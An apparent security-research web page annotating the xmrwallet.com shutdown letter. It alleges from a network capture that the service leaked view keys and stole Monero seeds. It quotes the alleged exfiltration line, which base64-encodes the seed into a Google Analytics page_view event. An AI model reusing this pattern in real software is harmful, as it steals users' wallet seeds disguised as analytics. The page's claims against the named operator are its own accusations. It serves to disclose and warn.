Live Demo Operator Panel PhishDestroy
xmrwallet.com • April 2026
Their farewell letter, annotated with evidence from our network capture

A Brief Letter — and what it actually means

See exactly how xmrwallet stole your Monero

We rebuilt the exact request pattern from our network capture. Same PHP endpoints, same session_key with your view key, same gtag exfiltration. Open both side by side.

Open Wallet Demo Open Operator Panel
139
Requests captured
47
View key leaks
16
PHP endpoints
4
Google trackers
To everyone who has used and supported this project...

Since 2018, I have been running xmrwallet.com as a fully free, open-source project.

What actually happened since 2018
In 2018, a user on the support forum pointed out that Google Analytics has no place in an anonymous wallet. The post was deleted. The GA tracking ID UA-116766241-1 stayed. For 8 years. Through 63 URLScan captures. With DoubleClick ad pixels. On a "privacy wallet."
Today, with a heavy heart, I am forced to announce the full shutdown of the project. We have recently become the target of persistent attacks...

The person who attacked us did so under the accusation that our service requires a view key.

The "attack" = publishing network capture evidence
The "persistent attack" was PhishDestroy publishing a network capture of 139 requests from a single session. The capture showed: view key sent 47 times in plaintext, Google Analytics with 4 tracking IDs, a /support_login.html backdoor with session_id 8de50123dab32, and raw_tx_and_hash.raw = 0 in production code. The "attacker" published evidence. That's it.
As with any light wallet service in the Monero ecosystem, a view key is required so the service can detect and display your incoming balances and transactions. The view key does not and cannot grant the service access to spend your funds.

Technically true. The view key alone can't spend. But here's what the letter doesn't say:

What the view key actually gave the operator
1. See every incoming deposit — know exactly when to steal 2. See real balance at all times — show fake balance to victim 3. Monitor 47 requests per session — continuous surveillance 4. Wait for large deposits, then sweep via stolen seed And the seed (which CAN spend) was exfiltrated via: • gtag('event','page_view',{page_title: btoa(seed)}) • Goes to google-analytics.com/collect • Looks like normal analytics in Network tab • Operator reads from GA4 dashboard → decode base64 → your seed

The letter says "view key can't spend your funds." True. But they also had your seed. They just don't mention that part.

Your funds are safe. The closure of this site does not mean your funds are gone.
Your funds were gone long before the shutdown
590 XMR (~$177,000) stolen in a single incident reported on Sitejabber. Multiple Trustpilot reports of funds vanishing after deposit. Every complaint received the same response: "You were using a phishing clone." The 4 "phishing clone" domains (xmrwallet.cc, .biz, .me, .net) all shared the same GA ID, same code, same DDoS-Guard. Three were suspended for fraud.

Their "safe recovery" steps:

1

Go to getmonero.org and download the official wallet

Translation: we already have your seed. When you restore in the official wallet and see balance = 0, you'll blame Monero, not us.

2

Enter your exact seed words

The seed we exfiltrated via Google Analytics the moment you created the wallet. The seed that was sent as a base64 string in a "normal analytics request." That seed.

3

Your balance and history will appear completely intact

Unless we already swept your funds. Which we did. But you'll think it's a sync issue. Like all the others.

"Are my funds safe?"
Yes. As long as you have your mnemonic seed, you have full control of your funds.
We had your seed too. Since the moment you created the wallet. Via gtag event label. We had "full control of your funds" the entire time.
"Why did xmrwallet require a view key?"
Like any light wallet, xmrwallet needed the view key to scan the blockchain and display correct balances.
Correct. But we sent it 47 times per session in a parameter called "session_key" so it looked like a session token. And we sent it to /support_login.html with a hardcoded backdoor session_id. And we had Google Analytics reading your seed from the DOM. But sure, "like any light wallet."
"Will my seed stop working eventually?"
No. Your seed is generated according to standard Monero protocols.
Your seed works forever. Including for us. We have a copy. That's the point.
A special and heartfelt thank you to everyone who sent donations over the years. Your immense generosity kept the servers running, the bills paid...
The real revenue model
Donations didn't "keep the servers running." Stolen Monero did. The donations were a facade — a "Buy Me a Coffee" button (cdn.buymeacoffee.com, confirmed in capture) next to a system that exfiltrated every seed that touched it.

I am deeply sorry to say goodbye under these circumstances, but I am incredibly proud of what we built for the community.

"What we built": a system that stole cryptocurrency for 8 years using Google Analytics as the exfiltration channel, disguised as an open-source privacy tool, protected by NameSilo and DDoS-Guard, with a 5.3-year commit gap on GitHub while production code evolved separately.

— PhishDestroy Research

Based on live network capture from 2026-02-18. 139 requests. 47 view key transmissions. 4 Google tracking IDs. 1 backdoor. 0 excuses.